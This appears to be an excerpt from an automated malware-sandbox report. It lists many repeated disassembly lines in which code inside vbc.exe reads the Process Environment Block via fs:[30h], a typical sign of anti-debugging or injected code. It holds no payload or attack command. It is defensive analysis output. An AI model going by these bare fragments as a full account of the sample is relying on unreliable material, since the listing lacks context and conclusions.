Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0548FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0548FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0548FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548FDE2 mov eax, dword ptr fs:[00000030h]	5_2_0548FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05478DF1 mov eax, dword ptr fs:[00000030h]	5_2_05478DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]	5_2_053C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]	5_2_053C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]	5_2_053C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]	5_2_053C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C2D8A mov eax, dword ptr fs:[00000030h]	5_2_053C2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]	5_2_053F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]	5_2_053F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]	5_2_053F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F2581 mov eax, dword ptr fs:[00000030h]	5_2_053F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DD5E0 mov eax, dword ptr fs:[00000030h]	5_2_053DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DD5E0 mov eax, dword ptr fs:[00000030h]	5_2_053DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054905AC mov eax, dword ptr fs:[00000030h]	5_2_054905AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054905AC mov eax, dword ptr fs:[00000030h]	5_2_054905AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FBC2C mov eax, dword ptr fs:[00000030h]	5_2_053FBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0545C450 mov eax, dword ptr fs:[00000030h]	5_2_0545C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0545C450 mov eax, dword ptr fs:[00000030h]	5_2_0545C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0549740D mov eax, dword ptr fs:[00000030h]	5_2_0549740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0549740D mov eax, dword ptr fs:[00000030h]	5_2_0549740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0549740D mov eax, dword ptr fs:[00000030h]	5_2_0549740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481C06 mov eax, dword ptr fs:[00000030h]	5_2_05481C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]	5_2_05446C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]	5_2_05446C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]	5_2_05446C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446C0A mov eax, dword ptr fs:[00000030h]	5_2_05446C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E746D mov eax, dword ptr fs:[00000030h]	5_2_053E746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FA44B mov eax, dword ptr fs:[00000030h]	5_2_053FA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05498CD6 mov eax, dword ptr fs:[00000030h]	5_2_05498CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D849B mov eax, dword ptr fs:[00000030h]	5_2_053D849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054814FB mov eax, dword ptr fs:[00000030h]	5_2_054814FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446CF0 mov eax, dword ptr fs:[00000030h]	5_2_05446CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446CF0 mov eax, dword ptr fs:[00000030h]	5_2_05446CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05446CF0 mov eax, dword ptr fs:[00000030h]	5_2_05446CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FE730 mov eax, dword ptr fs:[00000030h]	5_2_053FE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C4F2E mov eax, dword ptr fs:[00000030h]	5_2_053C4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C4F2E mov eax, dword ptr fs:[00000030h]	5_2_053C4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05498F6A mov eax, dword ptr fs:[00000030h]	5_2_05498F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EF716 mov eax, dword ptr fs:[00000030h]	5_2_053EF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FA70E mov eax, dword ptr fs:[00000030h]	5_2_053FA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FA70E mov eax, dword ptr fs:[00000030h]	5_2_053FA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0549070D mov eax, dword ptr fs:[00000030h]	5_2_0549070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0549070D mov eax, dword ptr fs:[00000030h]	5_2_0549070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0545FF10 mov eax, dword ptr fs:[00000030h]	5_2_0545FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0545FF10 mov eax, dword ptr fs:[00000030h]	5_2_0545FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DFF60 mov eax, dword ptr fs:[00000030h]	5_2_053DFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DEF40 mov eax, dword ptr fs:[00000030h]	5_2_053DEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D8794 mov eax, dword ptr fs:[00000030h]	5_2_053D8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054037F5 mov eax, dword ptr fs:[00000030h]	5_2_054037F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05447794 mov eax, dword ptr fs:[00000030h]	5_2_05447794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05447794 mov eax, dword ptr fs:[00000030h]	5_2_05447794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05447794 mov eax, dword ptr fs:[00000030h]	5_2_05447794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548AE44 mov eax, dword ptr fs:[00000030h]	5_2_0548AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548AE44 mov eax, dword ptr fs:[00000030h]	5_2_0548AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CE620 mov eax, dword ptr fs:[00000030h]	5_2_053CE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FA61C mov eax, dword ptr fs:[00000030h]	5_2_053FA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FA61C mov eax, dword ptr fs:[00000030h]	5_2_053FA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CC600 mov eax, dword ptr fs:[00000030h]	5_2_053CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CC600 mov eax, dword ptr fs:[00000030h]	5_2_053CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CC600 mov eax, dword ptr fs:[00000030h]	5_2_053CC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F8E00 mov eax, dword ptr fs:[00000030h]	5_2_053F8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05481608 mov eax, dword ptr fs:[00000030h]	5_2_05481608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]	5_2_053EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]	5_2_053EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]	5_2_053EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]	5_2_053EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EAE73 mov eax, dword ptr fs:[00000030h]	5_2_053EAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D766D mov eax, dword ptr fs:[00000030h]	5_2_053D766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0547FE3F mov eax, dword ptr fs:[00000030h]	5_2_0547FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]	5_2_053D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]	5_2_053D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]	5_2_053D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]	5_2_053D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]	5_2_053D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D7E41 mov eax, dword ptr fs:[00000030h]	5_2_053D7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0547FEC0 mov eax, dword ptr fs:[00000030h]	5_2_0547FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05408EC7 mov eax, dword ptr fs:[00000030h]	5_2_05408EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05498ED6 mov eax, dword ptr fs:[00000030h]	5_2_05498ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0545FE87 mov eax, dword ptr fs:[00000030h]	5_2_0545FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F16E0 mov ecx, dword ptr fs:[00000030h]	5_2_053F16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053D76E2 mov eax, dword ptr fs:[00000030h]	5_2_053D76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054446A7 mov eax, dword ptr fs:[00000030h]	5_2_054446A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05490EA5 mov eax, dword ptr fs:[00000030h]	5_2_05490EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05490EA5 mov eax, dword ptr fs:[00000030h]	5_2_05490EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05490EA5 mov eax, dword ptr fs:[00000030h]	5_2_05490EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F36CC mov eax, dword ptr fs:[00000030h]	5_2_053F36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F513A mov eax, dword ptr fs:[00000030h]	5_2_053F513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F513A mov eax, dword ptr fs:[00000030h]	5_2_053F513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]	5_2_053E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]	5_2_053E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]	5_2_053E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E4120 mov eax, dword ptr fs:[00000030h]	5_2_053E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E4120 mov ecx, dword ptr fs:[00000030h]	5_2_053E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C9100 mov eax, dword ptr fs:[00000030h]	5_2_053C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C9100 mov eax, dword ptr fs:[00000030h]	5_2_053C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C9100 mov eax, dword ptr fs:[00000030h]	5_2_053C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CB171 mov eax, dword ptr fs:[00000030h]	5_2_053CB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CB171 mov eax, dword ptr fs:[00000030h]	5_2_053CB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CC962 mov eax, dword ptr fs:[00000030h]	5_2_053CC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EB944 mov eax, dword ptr fs:[00000030h]	5_2_053EB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EB944 mov eax, dword ptr fs:[00000030h]	5_2_053EB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F61A0 mov eax, dword ptr fs:[00000030h]	5_2_053F61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F61A0 mov eax, dword ptr fs:[00000030h]	5_2_053F61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054541E8 mov eax, dword ptr fs:[00000030h]	5_2_054541E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F2990 mov eax, dword ptr fs:[00000030h]	5_2_053F2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FA185 mov eax, dword ptr fs:[00000030h]	5_2_053FA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053EC182 mov eax, dword ptr fs:[00000030h]	5_2_053EC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_053CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_053CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CB1E1 mov eax, dword ptr fs:[00000030h]	5_2_053CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054469A6 mov eax, dword ptr fs:[00000030h]	5_2_054469A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]	5_2_054849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]	5_2_054849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]	5_2_054849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054849A4 mov eax, dword ptr fs:[00000030h]	5_2_054849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]	5_2_054451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]	5_2_054451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]	5_2_054451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054451BE mov eax, dword ptr fs:[00000030h]	5_2_054451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]	5_2_053F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]	5_2_053F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]	5_2_053F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]	5_2_053F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F002D mov eax, dword ptr fs:[00000030h]	5_2_053F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]	5_2_053DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]	5_2_053DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]	5_2_053DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053DB02A mov eax, dword ptr fs:[00000030h]	5_2_053DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05482073 mov eax, dword ptr fs:[00000030h]	5_2_05482073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05491074 mov eax, dword ptr fs:[00000030h]	5_2_05491074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05447016 mov eax, dword ptr fs:[00000030h]	5_2_05447016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05447016 mov eax, dword ptr fs:[00000030h]	5_2_05447016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05447016 mov eax, dword ptr fs:[00000030h]	5_2_05447016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05494015 mov eax, dword ptr fs:[00000030h]	5_2_05494015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05494015 mov eax, dword ptr fs:[00000030h]	5_2_05494015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E0050 mov eax, dword ptr fs:[00000030h]	5_2_053E0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053E0050 mov eax, dword ptr fs:[00000030h]	5_2_053E0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FF0BF mov ecx, dword ptr fs:[00000030h]	5_2_053FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FF0BF mov eax, dword ptr fs:[00000030h]	5_2_053FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053FF0BF mov eax, dword ptr fs:[00000030h]	5_2_053FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0545B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0545B8D0 mov ecx, dword ptr fs:[00000030h]	5_2_0545B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0545B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0545B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0545B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0545B8D0 mov eax, dword ptr fs:[00000030h]	5_2_0545B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]	5_2_053F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]	5_2_053F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]	5_2_053F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]	5_2_053F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]	5_2_053F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]	5_2_053F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C9080 mov eax, dword ptr fs:[00000030h]	5_2_053C9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05443884 mov eax, dword ptr fs:[00000030h]	5_2_05443884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05443884 mov eax, dword ptr fs:[00000030h]	5_2_05443884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C58EC mov eax, dword ptr fs:[00000030h]	5_2_053C58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C40E1 mov eax, dword ptr fs:[00000030h]	5_2_053C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C40E1 mov eax, dword ptr fs:[00000030h]	5_2_053C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053C40E1 mov eax, dword ptr fs:[00000030h]	5_2_053C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_054090AF mov eax, dword ptr fs:[00000030h]	5_2_054090AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_05498B58 mov eax, dword ptr fs:[00000030h]	5_2_05498B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F3B7A mov eax, dword ptr fs:[00000030h]	5_2_053F3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053F3B7A mov eax, dword ptr fs:[00000030h]	5_2_053F3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_0548131B mov eax, dword ptr fs:[00000030h]	5_2_0548131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CDB60 mov ecx, dword ptr fs:[00000030h]	5_2_053CDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CF358 mov eax, dword ptr fs:[00000030h]	5_2_053CF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 5_2_053CDB40 mov eax, dword ptr fs:[00000030h]	5_2_053CDB40
